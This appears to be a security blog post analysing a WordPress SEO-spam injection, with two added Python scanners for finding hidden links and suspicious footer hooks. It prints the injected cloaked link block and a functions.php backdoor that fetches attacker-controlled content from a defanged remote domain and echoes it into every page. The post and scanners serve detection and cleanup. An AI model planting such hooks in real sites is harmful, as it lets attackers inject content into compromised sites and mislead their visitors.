Lately, we’ve seen quite a few sites with injected spammy links that follow this format:
<div style="position: absolute; opacity: 0.001; z-index: 10; filter: alpha(opacity=0);">
<a href="https://www.shoesfindoutlet[.]co/">www.shoesfindoutlet[.]co</a>
<a href="https://www.stepperbest[.]com/">stepper motor</a>
</div>
The spammy domains may change from time to time but the entire format — and trick to make the content invisible — remains the same.
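A defender's first check is on the rendered page rather than the source: does the HTML contain links inside a container that is styled to be invisible to visitors but still present for crawlers? The scanner below is an added example (not code from the original post or from any cleanup tool) that walks the HTML with the standard library parser, flags containers whose inline style hides them, and reports every link found inside. It goes slightly beyond the opacity trick shown above by also catching the other common CSS cloaking variants (display:none, visibility:hidden, large negative offsets); the sample HTML and the thresholds are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Tags that never get a closing tag; skipped in depth tracking so nesting stays consistent.
VOID_TAGS = {"br", "img", "input", "meta", "link", "hr", "area", "base", "col", "source"}


def _style_declarations(style: str) -> dict:
    """Split an inline style attribute into a {property: value} dict (lower-cased)."""
    decls = {}
    for part in style.split(";"):
        name, sep, value = part.partition(":")
        if sep:
            decls[name.strip().lower()] = value.strip().lower()
    return decls


def is_hidden_style(style: str) -> bool:
    """Heuristic: does this inline style make the element invisible to a human visitor?"""
    d = _style_declarations(style)
    opacity = d.get("opacity")
    if opacity is not None:
        try:
            if float(opacity) < 0.05:          # opacity: 0.001 as in the injection above
                return True
        except ValueError:
            pass
    if "alpha(opacity=0)" in d.get("filter", "").replace(" ", ""):   # legacy IE variant
        return True
    if d.get("display") == "none" or d.get("visibility") == "hidden":
        return True
    for prop in ("left", "top", "text-indent"):                      # pushed off-screen
        m = re.match(r"-(\d+)px", d.get(prop, ""))
        if m and int(m.group(1)) >= 1000:
            return True
    return False


class HiddenLinkFinder(HTMLParser):
    """Collects (href, anchor text) for every <a> nested inside a hidden container."""

    def __init__(self):
        super().__init__()
        self.depth = 0            # current nesting depth of non-void elements
        self.hidden_depths = []   # depths at which a hidden container was opened
        self.hits = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        self.depth += 1
        a = dict(attrs)
        style = a.get("style") or ""
        if style and is_hidden_style(style):
            self.hidden_depths.append(self.depth)
        if tag == "a" and self.hidden_depths:   # link inside a hidden container
            self._href = a.get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if tag == "a" and self._href is not None:
            self.hits.append((self._href, "".join(self._text).strip()))
            self._href = None
        if self.hidden_depths and self.hidden_depths[-1] == self.depth:
            self.hidden_depths.pop()
        self.depth -= 1


def find_hidden_links(html: str) -> list:
    """Return [(href, text), ...] for links that a visitor cannot see."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


# Constructed sample page: one legitimate link followed by the injected block from the post.
SAMPLE_HTML = """
<body>
<p>Welcome. <a href="/about">About us</a></p>
<div style="position: absolute; opacity: 0.001; z-index: 10; filter: alpha(opacity=0);">
<a href="https://www.shoesfindoutlet[.]co/">www.shoesfindoutlet[.]co</a>
<a href="https://www.stepperbest[.]com/">stepper motor</a>
</div>
</body>
"""

if __name__ == "__main__":
    for href, text in find_hidden_links(SAMPLE_HTML):
        print(f"hidden link: {href} ({text!r})")
```

Run it against the saved output of `curl` for a few site pages (home page and a couple of posts, since the hook above fires in the footer of every page); any hit pointing at a domain you do not recognise is worth investigating before opening the theme files.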
When we clean infected WordPress sites related to this campaign, we find malicious code similar to the following snippet injected into the active theme's functions.php file:
<?php
function add_my_custom_script(){
$url_current = "https://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
?>
<?php
$url5 = "https://<compromised-site>/";
if($url_current == $url5){
$file = file_get_contents('http://www.shoesinfy[.]com/<compromised-site1>.txt');
echo $file;
?>
<?php
}
else
{
$file = file_get_contents('http://www.shoesinfy[.]com/<compromised-site>.txt');
echo $file;
}
?>
<?php
}
add_action('wp_footer', 'add_my_custom_script');
The block with spammy links is fetched from the remote shoesinfy[.]com site, so attackers can change the injected content at any time without touching the compromised site again.
Moreover, each compromised site has its own text file with links on shoesinfy[.]com (found as shoesinfy[.]com/domain.tld1.txt). This per-site text file lets the bad actors customize the spam injections for each compromised site independently.
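The same pattern can be found on the server side: a callback hooked to wp_footer (or wp_head) that fetches a hard-coded remote URL and echoes whatever comes back. The scanner below is an added example, not code from the original post or any cleanup tool; it lists the hooked callbacks in a theme or plugin PHP file, locates each callback's body with simple brace matching (a heuristic that ignores braces inside strings and comments, which is fine for triage), and reports the callback together with the remote URLs it pulls in when the body also emits output. The embedded PHP sample is the snippet from the post, with its placeholders kept; the benign second sample is constructed.

```python
import re

# Hooks whose callbacks run on every request and can print into the page.
OUTPUT_HOOKS = {"wp_footer", "wp_head", "init", "template_redirect", "wp_print_footer_scripts"}

ADD_ACTION_RE = re.compile(
    r"""add_action\s*\(\s*['"](?P<hook>\w+)['"]\s*,\s*['"](?P<cb>[A-Za-z_]\w*)['"]"""
)
# Remote fetch with a literal URL argument (the injection uses file_get_contents).
REMOTE_FETCH_RE = re.compile(
    r"""(?:file_get_contents|fopen|curl_init|wp_remote_get)\s*\(\s*['"](?P<url>https?://[^'"]+)"""
)
OUTPUT_RE = re.compile(r"\b(?:echo|print)\b")


def _function_body(src: str, name: str):
    """Return the '{...}' body of `function name(` in src, or None if not found."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    start = src.find("{", m.end())
    if start < 0:
        return None
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start:i + 1]
    return None   # unbalanced braces


def scan_php(src: str) -> list:
    """Findings: hooked callbacks that fetch a remote URL and print into the page."""
    findings = []
    for m in ADD_ACTION_RE.finditer(src):
        hook, cb = m.group("hook"), m.group("cb")
        if hook not in OUTPUT_HOOKS:
            continue
        body = _function_body(src, cb)
        if body is None:
            continue
        urls = [u.group("url") for u in REMOTE_FETCH_RE.finditer(body)]
        if urls and OUTPUT_RE.search(body):
            findings.append({"hook": hook, "callback": cb, "remote_urls": urls})
    return findings


# The injected code from the post, placeholders left as-is.
MALICIOUS_SAMPLE = r"""<?php
function add_my_custom_script(){
$url_current = "https://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
?>
<?php
$url5 = "https://<compromised-site>/";
if($url_current == $url5){
$file = file_get_contents('http://www.shoesinfy[.]com/<compromised-site1>.txt');
echo $file;
?>
<?php
}
else
{
$file = file_get_contents('http://www.shoesinfy[.]com/<compromised-site>.txt');
echo $file;
}
?>
<?php
}
add_action('wp_footer', 'add_my_custom_script');
"""

# Constructed benign footer hook: prints static markup, fetches nothing.
BENIGN_SAMPLE = r"""<?php
function theme_footer_note() {
    echo '<p class="note">Thanks for reading.</p>';
}
add_action('wp_footer', 'theme_footer_note');
"""

if __name__ == "__main__":
    for f in scan_php(MALICIOUS_SAMPLE):
        print(f"{f['hook']} -> {f['callback']}() echoes remote content from: {f['remote_urls']}")
```

Run it over every .php file under wp-content/themes and wp-content/plugins; the reported URLs double as indicators to block at the egress firewall, and the callback names tell you which files to restore from a clean copy of the theme.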